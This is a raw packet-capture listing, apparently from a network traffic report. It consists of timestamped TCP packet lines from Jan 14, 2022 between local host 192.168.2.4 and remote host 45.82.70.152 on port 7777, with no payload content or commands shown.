                                                                                                                                  Jan 14, 2022 14:10:41.650512934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.650553942 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.650567055 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.650618076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.650666952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.650717020 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.650779963 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.650856018 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.650897980 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.650926113 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.650976896 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651025057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651047945 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.651089907 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651144981 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.651154995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651216984 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651256084 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.651283979 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651366949 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651406050 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.651437044 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651490927 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651527882 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.651545048 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651604891 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651640892 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.651674032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651748896 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651787043 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.651817083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651880980 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651920080 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.651952028 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.651957989 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652018070 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652066946 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652069092 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652123928 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652169943 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652193069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652245045 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652245045 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652287960 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652293921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652343035 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652380943 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652390957 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652441025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652476072 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652491093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652540922 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652579069 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652589083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652637005 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652678967 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652686119 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652734995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652770996 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652785063 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652832985 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652868986 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652882099 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652930021 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.652965069 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.652978897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653027058 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653062105 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653074980 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653122902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653158903 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653171062 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653220892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653255939 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653269053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653316975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653352976 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653367043 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653415918 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653450966 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653464079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653512955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653551102 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653562069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653598070 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653610945 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653646946 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653661013 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653698921 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653709888 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653759956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653765917 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653801918 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653810978 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653860092 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653882980 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653932095 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653934002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.653976917 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.653986931 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.654026985 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.654038906 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.654078960 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.654090881 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.654130936 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679486990 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.679534912 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.679554939 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679574013 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.679590940 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679613113 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.679622889 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679651022 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.679651022 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679692030 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679763079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.679811001 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679821968 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.679860115 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679872036 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.679910898 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679922104 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.679959059 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.679971933 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680011034 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680022001 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680061102 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680071115 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680109024 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680119991 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680160046 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680169106 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680207968 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680217981 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680262089 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680269003 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680306911 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680324078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680362940 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680375099 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680413961 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680424929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680464029 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680476904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680516005 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680527925 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680567980 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680582047 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680619955 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680634022 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680675030 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680684090 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680725098 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680736065 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680775881 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680785894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680825949 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680838108 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680879116 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680888891 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680927038 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680939913 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.680978060 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.680989027 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681029081 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681039095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681077957 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681091070 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681128979 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681139946 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681179047 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681191921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681236029 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681241035 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681284904 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681292057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681333065 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681344986 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681385040 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681395054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681430101 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681446075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681483984 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681494951 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681545973 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681550026 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681596041 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681602001 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681641102 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681653023 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681694984 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681720972 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681766033 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681766987 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681828022 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681859016 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681899071 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681911945 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681941032 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.681951046 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.681991100 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682003975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682041883 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682056904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682096958 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682109118 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682152987 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682161093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682202101 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682213068 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682257891 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682264090 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682303905 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682312965 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682353973 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682365894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682404995 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682416916 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682460070 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682467937 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682507038 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682519913 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682563066 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682570934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682632923 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682643890 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682682037 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682683945 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682725906 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682734966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682774067 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682785988 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682826042 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682835102 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682876110 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682888985 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682928085 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682941914 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.682981968 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.682991982 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683031082 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683043003 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683084011 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683094025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683134079 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683145046 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683183908 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683195114 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683234930 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683244944 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683284998 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683295965 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683336020 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683346033 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683386087 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683397055 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683437109 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683446884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683485985 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683495998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683537006 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683549881 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683588982 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683598995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683638096 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683649063 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683700085 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683700085 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683738947 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683751106 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683789015 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683799982 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683839083 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683851004 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683891058 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683900118 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683940887 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.683950901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.683989048 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684000969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684040070 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684051991 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684089899 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684102058 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684142113 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684150934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684189081 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684200048 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684248924 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684271097 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684293985 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684300900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684365034 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684369087 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684412003 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684422970 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684465885 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684474945 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684520006 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684536934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684581041 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684587955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684628963 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684637070 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684679031 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684686899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684729099 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.684736967 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.684778929 CET497787777192.168.2.445.82.70.152
